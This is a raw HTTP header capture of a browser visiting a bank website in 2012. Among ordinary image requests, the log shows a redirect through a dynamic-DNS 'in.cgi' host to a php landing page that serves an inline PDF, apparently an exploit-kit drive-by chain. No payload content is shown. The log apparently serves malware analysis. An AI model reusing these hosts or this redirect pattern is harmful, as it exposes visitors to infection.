GET /img/services_br.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:43 GMT Etag: "2580368-f6-4ccb6c3821915" Accept-Ranges: bytes Content-Length: 246 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
GET /img/s1.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:39 GMT Etag: "2580358-7ab-4ccb6c34d25cf" Accept-Ranges: bytes Content-Length: 1963 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
GET /img/s2.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:39 GMT Etag: "2580359-7dd-4ccb6c3517146" Accept-Ranges: bytes Content-Length: 2013 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive
GET /img/s4.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:40 GMT Etag: "258035d-6e3-4ccb6c35d9349" Accept-Ranges: bytes Content-Length: 1763 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
GET /img/s3.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:40 GMT Etag: "258035b-c86-4ccb6c3591a36" Accept-Ranges: bytes Content-Length: 3206 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
GET /in.cgi?14 HTTP/1.1 Host: wwfcfpmfwpompwow.mynumber.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/	HTTP/1.1 302 Found Content-Type: text/html Server: nginx Date: Wed, 07 Nov 2012 21:48:25 GMT Connection: keep-alive Set-Cookie: folqb14=_2_; domain=wwfcfpmfwpompwow.mynumber.org; path=/; expires=Sat, 25-Aug-2012 21:57:47 GMT folqb12=_1_; domain=wwfcfpmfwpompwow.mynumber.org; path=/; expires=Sat, 25-Aug-2012 21:57:47 GMT Location: http://nnvxf.lflinkup.com/guaranteeing/academic_natural.php Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 180
GET /img/s5.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:41 GMT Etag: "258035f-956-4ccb6c3632448" Accept-Ranges: bytes Content-Length: 2390 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
GET /img/s6.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:41 GMT Etag: "2580360-899-4ccb6c3679ffc" Accept-Ranges: bytes Content-Length: 2201 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive
GET /img/s7.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:41 GMT Etag: "2580362-ca7-4ccb6c36c1c05" Accept-Ranges: bytes Content-Length: 3239 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive
GET /img/s8.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:41 GMT Etag: "2580363-f49-4ccb6c36fbd9f" Accept-Ranges: bytes Content-Length: 3913 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT Etag: "87de33-256-4cd617ed12480" Accept-Ranges: bytes Content-Length: 598 Date: Wed, 07 Nov 2012 21:48:26 GMT Connection: keep-alive
GET /img/arrow_right.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:26 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:08 GMT Etag: "25802df-627-4ccb6c16e5e45" Accept-Ranges: bytes Content-Length: 1575 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive
GET /img/arrow_left.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:26 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:07 GMT Etag: "25802de-641-4ccb6c16b3051" Accept-Ranges: bytes Content-Length: 1601 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive
GET /guaranteeing/academic_natural.php HTTP/1.1 Host: nnvxf.lflinkup.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/	HTTP/1.1 200 OK Content-Type: text/html Server: nginx Date: Wed, 07 Nov 2012 21:48:26 GMT Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.18
GET /guaranteeing/academic_natural.php?hiqbfi=1g:2v:33:2v:2w&rhfsm=30&xevgnte=1j:1h:1n:33:1f:1i:1n:1j:1l:1m&ylvrgkqq=1n:1d:1f:1d:1f:1d:1j:1k:1l HTTP/1.1 Host: nnvxf.lflinkup.com GET /guaranteeing/academic_natural.php?hiqbfi=1g:2v:33:2v:2w&rhfsm=30&xevgnte=1j:1h:1n:33:1f:1i:1n:1j:1l:1m&ylvrgkqq=1n:1d:1f:1d:1f:1d:1j:1k:1l HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://nnvxf.lflinkup.com/guaranteeing/academic_natural.php	HTTP/1.1 200 OK Content-Type: application/pdf Server: nginx Date: Wed, 07 Nov 2012 21:48:29 GMT Connection: keep-alive X-Powered-By: PHP/5.3.18 Accept-Ranges: bytes Content-Length: 13502 Content-Disposition: inline; filename=27c53.pdf
POST /slide.php?section_id=310&rnd=0.9519319190399909 HTTP/1.1 Host: www.atabank.com POST /slide.php?section_id=310&rnd=0.9519319190399909 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1 Pragma: no-cache Cache-Control: no-cache Content-Length: 0	HTTP/1.1 200 OK Content-Type: text/plain; charset=windows-1251 Date: Wed, 07 Nov 2012 21:48:35 GMT Server: Apache X-Powered-By: PHP/4.4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked
POST /slide.php?section_id=312&rnd=0.3282888983701543 HTTP/1.1 Host: www.atabank.com POST /slide.php?section_id=312&rnd=0.3282888983701543 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1 Pragma: no-cache Cache-Control: no-cache Content-Length: 0	HTTP/1.1 200 OK Content-Type: text/plain; charset=windows-1251 Date: Wed, 07 Nov 2012 21:48:48 GMT Server: Apache X-Powered-By: PHP/4.4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked
POST /slide.php?section_id=311&rnd=0.7982276940616176 HTTP/1.1 Host: www.atabank.com POST /slide.php?section_id=311&rnd=0.7982276940616176 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1 Pragma: no-cache Cache-Control: no-cache Content-Length: 0	HTTP/1.1 200 OK Content-Type: text/plain; charset=windows-1251 Date: Wed, 07 Nov 2012 21:48:54 GMT Server: Apache X-Powered-By: PHP/4.4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked